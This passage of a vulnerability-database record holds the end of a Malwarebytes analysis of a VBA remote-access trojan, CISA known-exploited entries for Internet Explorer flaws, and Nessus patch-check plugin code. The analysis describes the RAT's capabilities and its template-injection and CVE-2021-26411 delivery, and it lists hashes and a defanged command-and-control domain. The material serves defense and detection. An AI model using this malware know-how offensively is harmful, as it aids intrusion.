database.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/install-4.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/install-4.png> \"\" )Figure 18: Install.php\n\n`stats.php` is the file that performs the main actions of this Rat that matches the functionalities we reported here. It also has some more functions including: `delete_task, disable_task, enable_task, show_tasks, add_task, format_task and add_user.`\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/downupfuncs-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/downupfuncs-1.png> \"\" )Figure 19: Stats.php [![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/actions-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/actions-1.png> \"\" )Figure 20: Stats.php\n\n### Conclusion\n\nIn this blog post we have analyzed an attack in which threat actors have used two different methods to infect their victims. Both techniques have been loaded by malicious documents using the template injection technique. The first template contains a url to download a remote template that has an embedded full-featured VBA Rat. This Rat has several different capabilities including downloading, uploading and executing files. The second template is an exploit for CVE-2021-26411 which executes a shell-code to deploy the same VBA Rat. The VBA Rat is not obfuscated but still has used some interesting techniques for shell-code injection.\n\nAs the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well. The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag. \n\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/blockcrima-600x516.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/blockcrima.png> \"\" )\n\n### IOCs\n\n**Maldocs: \n**03eb08a930bb464837ede77df6c66651d526bab1560e7e6e0e8466ab23856bac \n0661fc4eb09e99ba4d8e28a2d5fae6bb243f6acc0289870f9414f9328721010a \n \n**Remote template:** \nfffe061643271155f29ae015bca89100dec6b4b655fe0580aa8c6aee53f34928 \n \n**C2 server:** \ncloud-documents[.]com\n\nThe post [Crimea "manifesto" deploys VBA Rat using double attack vectors](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-29T15:00:00", "type": "malwarebytes", "title": "Crimea \u201cmanifesto\u201d deploys VBA Rat using double attack vectors", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:00:00", "id": "MALWAREBYTES:232C556149FB9AC828C416ADCCF93766", "href": "https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Internet Explorer contains an unspecified vulnerability which allows for memory corruption.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26411", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Internet Explorer contains a memory corruption vulnerability which can allow for remote code execution in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1380", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:25:30", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability:\n\n - A memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26411"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/147228", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147228);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-26411\");\n script_xref(name:\"MSKB\", value:\"5000847\");\n script_xref(name:\"MSKB\", value:\"5000800\");\n script_xref(name:\"MSKB\", value:\"5000841\");\n script_xref(name:\"MSKB\", value:\"5000844\");\n script_xref(name:\"MSKB\", value:\"5000848\");\n script_xref(name:\"MSFT\", value:\"MS21-5000847\");\n script_xref(name:\"MSFT\", value:\"MS21-5000800\");\n script_xref(name:\"MSFT\", value:\"MS21-5000841\");\n script_xref(name:\"MSFT\", value:\"MS21-5000844\");\n script_xref(name:\"MSFT\", value:\"MS21-5000848\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"Security Updates for Internet Explorer (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing a security update. It is, therefore, affected by the\nfollowing vulnerability:\n\n - A memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\");\n # https://support.microsoft.com/en-us/topic/kb5000800-cumulative-security-update-for-internet-explorer-march-9-2021-b7b43be0-e9ef-48b6-b102-ed28fd89e0f2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8426b33\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000841-monthly-rollup-3a2cced1-f436-40c3-a8a1-645f86759088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c5851d4\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000844-monthly-rollup-d90d0eb1-6319-4a7e-97f6-68fbd306fd5a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177a5bc6\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000847-monthly-rollup-8afa2933-e9da-4481-a0bc-18deb314974e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df958afd\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000848-monthly-rollup-52f23db9-e1b0-4829-81b9-198fc82891a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ff1e9b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5000800\n -KB5000841\n -KB5000844\n -KB5000847\n -KB5000848\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26411\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000800',\n '5000841',\n '5000844',\n '5000847',\n '5000848'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21532\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5000800 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5000848 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000848', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5000847 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000847', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5000841 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000841', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5000844 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000844', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-27T15:31:11", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability:\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26419)", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (May 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26419"], "modified": "2021-05-27T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_MAY_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/149386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149386);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/27\");\n\n script_cve_id(\"CVE-2021-26419\");\n script_xref(name:\"MSKB\", value:\"5003210\");\n script_xref(name:\"MSFT\", value:\"MS21-5003210\");\n script_xref(name:\"MSKB\", value:\"5003233\");\n script_xref(name:\"MSFT\", value:\"MS21-5003233\");\n script_xref(name:\"MSKB\", value:\"5003209\");\n script_xref(name:\"MSFT\", value:\"MS21-5003209\");\n script_xref(name:\"MSKB\", value:\"5003165\");\n script_xref(name:\"MSKB\", value:\"5003208\");\n script_xref(name:\"MSFT\", value:\"MS21-5003165\");\n script_xref(name:\"MSFT\", value:\"MS21-5003208\");\n script_xref(name:\"IAVA\", value:\"2021-A-0224\");\n\n script_name(english:\"Security Updates for Internet Explorer (May 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing a security update. It is, therefore, affected by the\nfollowing vulnerability:\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26419)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5003165\n -KB5003208\n -KB5003209\n -KB5003210\n -KB5003233\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26411\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nvar bulletin = 'MS21-05';\nvar kbs = make_list(\n '5003165',\n '5003208',\n '5003209',\n '5003210',\n '5003233'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nvar os = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21542\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\")\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5003165 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5003209 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003209', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5003208 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003208', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5003233 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003233', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5003210 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003210', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:53", "description": "The Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (August 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1380", "CVE-2020-1567", "CVE-2020-1570"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/139498", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139498);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-1380\", \"CVE-2020-1567\", \"CVE-2020-1570\");\n script_xref(name:\"MSKB\", value:\"4571729\");\n script_xref(name:\"MSKB\", value:\"4571687\");\n script_xref(name:\"MSKB\", value:\"4571703\");\n script_xref(name:\"MSKB\", value:\"4571730\");\n script_xref(name:\"MSFT\", value:\"MS20-4571729\");\n script_xref(name:\"MSFT\", value:\"MS20-4571687\");\n script_xref(name:\"MSFT\", value:\"MS20-4571703\");\n script_xref(name:\"MSFT\", value:\"MS20-4571730\");\n script_xref(name:\"IAVA\", value:\"2020-A-0375-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"Security Updates for Internet Explorer (August 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571729/windows-7-update\");\n # https://support.microsoft.com/en-us/help/4571687/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc565208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571703/windows-8-1-update\");\n # https://support.microsoft.com/en-us/help/4571730/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87c93762\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4571729\n -KB4571687\n -KB4571703\n -KB4571730\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1570\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-08';\nkbs = make_list(\n'4571687',\n'4571736',\n'4571730',\n'4571703',\n'4571729'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", 